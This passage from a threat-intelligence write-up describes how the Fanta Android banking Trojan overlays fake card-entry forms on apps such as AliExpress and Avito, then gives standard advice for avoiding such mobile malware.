    Fanta checks which applications are running on the infected device. If an application of interest has been opened, the Trojan displays a phishing window on top of all others, which is a form for entering bank card data. The user is asked to enter the following data:

    • Card number
    • Card expiration date
    • CVV
    • Cardholder name (not for all banks)

    Depending on the running application, different phishing windows appear. The original article shows examples of some of them: the Aliexpress form, the Avito form, and the form used for applications such as Google Play Market, Aviasales, Pandao, Booking and Trivago.

    How it really happened

    Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. So the real, non-dramatized version differs from the one told earlier: a person received an interesting SMS and then handed it over to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. A happy ending, right? However, not all stories end so well, and so that yours does not turn into the dramatized version with a loss of money, in most cases it is enough to follow the rules that have been repeated for a long time:

    • do not install applications on Android OS mobile devices from sources other than Google Play
    • when installing an application, pay special attention to the permissions the application requests
    • pay attention to the extension of downloaded files
    • install Android OS updates regularly
    • do not visit suspicious resources and do not download files from them
    • do not click on links received in SMS messages.

Source: www.hab.com
